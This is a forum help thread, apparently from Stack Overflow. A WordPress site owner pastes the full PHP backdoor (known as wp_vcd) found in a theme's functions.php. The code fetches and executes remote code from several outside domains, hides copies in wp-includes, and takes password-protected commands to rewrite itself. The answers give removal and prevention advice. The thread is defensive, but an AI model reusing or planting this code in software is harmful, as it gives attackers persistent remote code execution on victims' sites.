My WordPress website got hacked and is being redirected to some unknown source

Question

I don't know how it happened but since a few days ago some code appeared inside my "functions.php" header (My website doesn't work whenever I remove this unknown code), and it seems to redirect and mirroring everything to some unknown source. Now it has affected my SSL Certificate and showing error messages like "This is not a private connection" whenever I try to access my website.

Below is the piece of code that was added to the header of my "functions.php".

Can anyone help me to solve this problem? Thanks

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f22fd2bb9496d1dfe84e31567316a32d')) {
    $div_code_name = "wp_vcd";
    switch ($_REQUEST['action']) {
        case 'change_domain';
            if (isset($_REQUEST['newdomain'])) {
                if (!empty($_REQUEST['newdomain'])) {
                    if ($file = @file_get_contents(__FILE__)) {
                        if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain)) {
                            $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
            break;
        case 'change_code';
            if (isset($_REQUEST['newcode'])) {
                if (!empty($_REQUEST['newcode'])) {
                    if ($file = @file_get_contents(__FILE__)) {
                        if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode)) {
                            $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
            break;
        default:
            print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }
    die("");
}
$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if (!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            fwrite($handle, "<?php\n" . $phpCode);
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        $wp_auth_key = 'e810cc8873fd72ff6d1585ebccddae8e';
        if (($tmpcontent = @file_get_contents("http://www.fonjy.cc/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.fonjy.cc/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
            }
        } elseif ($tmpcontent = @file_get_contents("http://www.fonjy.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
            }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        } elseif (($tmpcontent = @file_get_contents("http://www.fonjy.top/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.fonjy.top/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        }
    }
}
//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?>

check WordPress theme: header.php and footer file and show code — Bilal Ahmed, Dec 05 '17 at 06:30
@Drickuss - what's the error generate when website is running?? — Priyanka Modi, Dec 05 '17 at 06:35
Remove the code from the server. Revert the database to a backup before this happened (surely you made some back ups?). Change any passwords you have for your server/admin. Google on all the plugins you're using to see if any of them have security updates. Redeploy your site. — M. Eriksson, Dec 05 '17 at 06:40

score 0 · Answer 1 · answered Mar 14 '21 at 14:04

yes, after this code deleted from theme funtion.php files, delete these files also from wp-includes folder, if these files present in

/wp-includes/wp-feed.php
/wp-includes/wp-tmp.php
/wp-includes/wp-vcd.php

and check /wp-includes/post.php file, if this file has similar code like theme function file delete it also, make sure before all these take a backup at least these all five files, thanks, enjoy.

score -2 · Answer 2 · answered Jan 12 '18 at 09:34

This occurs by using NULLED themes and plugins

You have to know that everything nulled is contaminated by malicious code.

When Nulled is installed, the code wakes up at a certain moment, goes through all the folders of your hosting, and installs a script in addition to adding several files.

wp-vcd.php wp-tmp.php:

AND ALSO modifies post.php functions.php

score -2 · Answer 3 · answered Apr 09 '19 at 16:53

-2

Stop using nulled themes and plugins, that's what you get. read this, you might want to re install the whole things again - without the nulled software. https://gokhan.ozar.net/blog/removing-malware-from-wordpress/

answered Apr 09 '19 at 16:53

decoder88

480
4
6

M.K.Dan · Answer 4 · 2017-12-06T10:31:40.193

-3

Reinstall your theme. Switch to a new theme and delete the previously used theme which caused the error. Now reinstall your old theme as a fresh install and activate it. Each theme has its own functions.php file. Just a couple of clicks.

I'm not sure what the cause of your problem is, but if it's because of Plugins, then remove unwanted plugins and deactivate the useful plugins and check whether the website works.

If that doesn't help, you can try to export your current WordPress posts and import to a new WordPress install and point your domain to it. Let me know what it says.

edited Dec 06 '17 at 10:31

answered Dec 05 '17 at 08:22

M.K.Dan

39
9

You already posted this exact content as a prior answer, which was already deleted based on content review. Please do not re-post something that's already been deleted. It's no more valid now than it was when you first posted. And there was a *very long* list of comments explaining exactly why this wasn't a valid answer. – David Makogon Dec 06 '17 at 06:14
I have shown reference to the guidelines. **But I can't write a good answer without more information! Answers don't have to be exhaustive or infallible, they just need to try to answer the question. It's perfectly fine to post an answer saying, for example, "I'm not sure what the cause of your problem is, but if it's X, you can solve it by doing Y. If that doesn't help, try Z and let me know what it says.** Even if you are a moderator, you can't break the guidelines. They are there for a reason. – M.K.Dan Dec 06 '17 at 09:26
The questioner says that a code is being added to the fuction.php file. The code might not be added because of a plugin but the error caused might be configured by a plugin. The error message is unknown. As per the guideline, a person can answer based on what he gets from the question. A moderator is not above the guidelines. But I can understand they can make decisions based on 'the people they know', 'membership level'. They can just stick to the rules or just misuse their rights given to them. – M.K.Dan Dec 06 '17 at 10:15

score -3 · Answer 5 · answered Jun 15 '18 at 08:06

-3

see the solution where the suspicious codes are found in .htacces file. https://stackoverflow.com/a/50871403/4639822

answered Jun 15 '18 at 08:06

ARUNBALAN NV

1,634
4
17
39

My WordPress website got hacked and is being redirected to some unknown source

5 Answers5